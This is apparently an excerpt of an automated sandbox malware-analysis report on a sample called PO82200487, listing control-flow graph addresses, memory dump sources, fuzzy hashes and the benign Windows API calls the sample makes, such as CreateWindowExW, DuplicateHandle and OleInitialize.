                                              • Instruction ID: 32687a476ae5eb13cfec88119d21bb778cce34fd6b0136bfae8d2f4a136dd576
                                              • Opcode Fuzzy Hash: 8f571b3c93dc444d45f4d23813f312b4b29cc9134b40d9ecc09698d5b58ab403
                                              • Instruction Fuzzy Hash: FE714670A00B068FE7A5DF6AD44175ABBF5FF88200F10892ED49AD7B50D774E849CB91

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2480 6af0f70-6af0fd6 2481 6af0fd8-6af0fde 2480->2481 2482 6af0fe1-6af0fe8 2480->2482 2481->2482 2483 6af0fea-6af0ff0 2482->2483 2484 6af0ff3-6af1092 CreateWindowExW 2482->2484 2483->2484 2486 6af109b-6af10d3 2484->2486 2487 6af1094-6af109a 2484->2487 2491 6af10d5-6af10d8 2486->2491 2492 6af10e0 2486->2492 2487->2486 2491->2492 2493 6af10e1 2492->2493 2493->2493
                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06AF1082
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2572564108.0000000006AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_6af0000_PO82200487.jbxd
                                              Similarity
                                              • API ID: CreateWindow
                                              • String ID:
                                              • API String ID: 716092398-0
                                              • Opcode ID: d9ff10722965e39b15fa1f3633e8122fc948e141d33f763a8a91fb58b3147112
                                              • Instruction ID: 347fd40ddfb7d388eded091724c6623e47cb216688697f4317fd2cce29146b72
                                              • Opcode Fuzzy Hash: d9ff10722965e39b15fa1f3633e8122fc948e141d33f763a8a91fb58b3147112
                                              • Instruction Fuzzy Hash: 4D41CEB1D10349DFDB14DFAAC884ADEBBB5BF48310F24812AE918AB250D7B59845CF91

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2494 6af3530-6af356c 2495 6af361c-6af363c 2494->2495 2496 6af3572-6af3577 2494->2496 2503 6af363f-6af364c 2495->2503 2497 6af35ca-6af3602 CallWindowProcW 2496->2497 2498 6af3579-6af35b0 2496->2498 2499 6af360b-6af361a 2497->2499 2500 6af3604-6af360a 2497->2500 2504 6af35b9-6af35c8 2498->2504 2505 6af35b2-6af35b8 2498->2505 2499->2503 2500->2499 2504->2503 2505->2504
                                              APIs
                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 06AF35F1
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2572564108.0000000006AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_6af0000_PO82200487.jbxd
                                              Similarity
                                              • API ID: CallProcWindow
                                              • String ID:
                                              • API String ID: 2714655100-0
                                              • Opcode ID: 15542b0f1557e1df47cd20db38dfc1803e8c5e31848274b94f83c0405e810b7e
                                              • Instruction ID: 2a0630cea25d0a79594c03141d27dc53895ce10f05a83208a1f362913235d4e2
                                              • Opcode Fuzzy Hash: 15542b0f1557e1df47cd20db38dfc1803e8c5e31848274b94f83c0405e810b7e
                                              • Instruction Fuzzy Hash: 934157B8910349CFDB54DF99C448AAABBF5FB88314F248459E518AB320C730A841CFA1

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2513 15cae98-15caf2c DuplicateHandle 2514 15caf2e-15caf34 2513->2514 2515 15caf35-15caf52 2513->2515 2514->2515
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015CAF1F
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2567977141.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_15c0000_PO82200487.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 6dffa8e1b3c45ca43a7c6f5380ef1a85c3f234c6e67f457bd90f410ba7794f1c
                                              • Instruction ID: 53597adbb122ca8d2eee4740e5d210a363e96113d684f37860351121006e5616
                                              • Opcode Fuzzy Hash: 6dffa8e1b3c45ca43a7c6f5380ef1a85c3f234c6e67f457bd90f410ba7794f1c
                                              • Instruction Fuzzy Hash: 5921C4B59002499FDB10CF9AD584ADEBFF5FB48310F14841AE918A7350D374A954CF65

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2508 15cae90-15caf2c DuplicateHandle 2509 15caf2e-15caf34 2508->2509 2510 15caf35-15caf52 2508->2510 2509->2510
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015CAF1F
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2567977141.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_15c0000_PO82200487.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 19bbc99b9ae7a0f8630bcad7f70c3f29810485569ae19547413609ec969b1a19
                                              • Instruction ID: 0107a05281cf3df7e6f76af67f23952230d16be4c1a63910b99bed42fece6eb4
                                              • Opcode Fuzzy Hash: 19bbc99b9ae7a0f8630bcad7f70c3f29810485569ae19547413609ec969b1a19
                                              • Instruction Fuzzy Hash: 6821E4B5D002099FDB10CF99D984ADEBFF5FB48320F14841AE958A7350D378A954CF64

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2518 69ece2c-69ee450 2520 69ee458-69ee483 GetModuleHandleW 2518->2520 2521 69ee452-69ee455 2518->2521 2522 69ee48c-69ee4a0 2520->2522 2523 69ee485-69ee48b 2520->2523 2521->2520 2523->2522
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,069EE23C), ref: 069EE476
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2572470309.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_69e0000_PO82200487.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 90a29fbaa7fe8c373a0449189cb1a8d6314c427b37c649d0910e5398f7a9b6b8
                                              • Instruction ID: 775cda7ade20eb10613b8e1d716e9c8f5ae95bed4d2a9aadb88f92dd5a733f81
                                              • Opcode Fuzzy Hash: 90a29fbaa7fe8c373a0449189cb1a8d6314c427b37c649d0910e5398f7a9b6b8
                                              • Instruction Fuzzy Hash: 83110FB5C007498FDB10DF9AC444B9EFBF8EB89224F10842AD829B7650D379A545CFA5
                                              APIs
                                              • OleInitialize.OLE32(00000000), ref: 06AF5BCD
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2572564108.0000000006AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_6af0000_PO82200487.jbxd
                                              Similarity
                                              • API ID: Initialize
                                              • String ID:
                                              • API String ID: 2538663250-0
                                              • Opcode ID: ff4bc401d70aa67ac8266488e87ff7e87bc7f523cecf35657a4279d61a8e2e2a
                                              • Instruction ID: 1e31648ec6e94e8b78e8f21fe3d085b4d1c8aad5cfa34541797344acb7cd6ff6
                                              • Opcode Fuzzy Hash: ff4bc401d70aa67ac8266488e87ff7e87bc7f523cecf35657a4279d61a8e2e2a
                                              • Instruction Fuzzy Hash: BB1103B5C043498FDB10DF9AD449B9EBBF4EB48220F108859E519A7340D374A944CFA5
                                              APIs
                                              • OleInitialize.OLE32(00000000), ref: 06AF5BCD
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2572564108.0000000006AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_6af0000_PO82200487.jbxd
                                              Similarity
                                              • API ID: Initialize
                                              • String ID:
                                              • API String ID: 2538663250-0
                                              • Opcode ID: d6e92c849a213019f4871bbdd6a166f9b6b01a6384977a62ef9409c7d22f6d60
                                              • Instruction ID: 67978bfa99e28badaa59bf8b122a59814302dbd0f5b54817d381c5f25399c076
                                              • Opcode Fuzzy Hash: d6e92c849a213019f4871bbdd6a166f9b6b01a6384977a62ef9409c7d22f6d60
                                              • Instruction Fuzzy Hash: 6E1133B58003498FCB20DF9AD445BCEFFF8AB48220F108859E559A3340D378A544CFA5
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2567717905.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_157d000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 41779b7245baa77c38416ff6c0486ac4ad833264150ddd0abb09e3b10959cda8
                                              • Instruction ID: 4ffa6a2dbc0314b19512d78ebb671cee1b763d9f8895be76cbe260560ba4a60d
                                              • Opcode Fuzzy Hash: 41779b7245baa77c38416ff6c0486ac4ad833264150ddd0abb09e3b10959cda8
                                              • Instruction Fuzzy Hash: 7421FF756042449FDB16DF54E980B2ABBA5FF84214F24C969D80A4F282D33AD806CA62
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2567717905.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_157d000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1e2b3b4bed19f7b3c3e70f966347b4342e60bcc4aad68d6de13978df7bd8c30d
                                              • Instruction ID: 24f49b157095ad5f6a5fa3755eb0ba7c586c8ebc7dfb608018150a4aabdcfeb7
                                              • Opcode Fuzzy Hash: 1e2b3b4bed19f7b3c3e70f966347b4342e60bcc4aad68d6de13978df7bd8c30d
                                              • Instruction Fuzzy Hash: E62168755093808FCB03CF64D990B15BF71BF46214F28C5EAD8498F6A7C33A980ACB62
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2567669685.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_156d000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 827ee908721912c4379c07d9a3bad436081c925763c47301ea19c407e627c42b
                                              • Instruction ID: 9a4cb1a9cbe3f3f0893b8c6ce7692a681c5912a859eb36c5c1d2ec28b6509216
                                              • Opcode Fuzzy Hash: 827ee908721912c4379c07d9a3bad436081c925763c47301ea19c407e627c42b
                                              • Instruction Fuzzy Hash: F1F0C2716043409FEB108A0AC9C4B66FFACEB41634F18C45AED4C4F283C2799840CAB1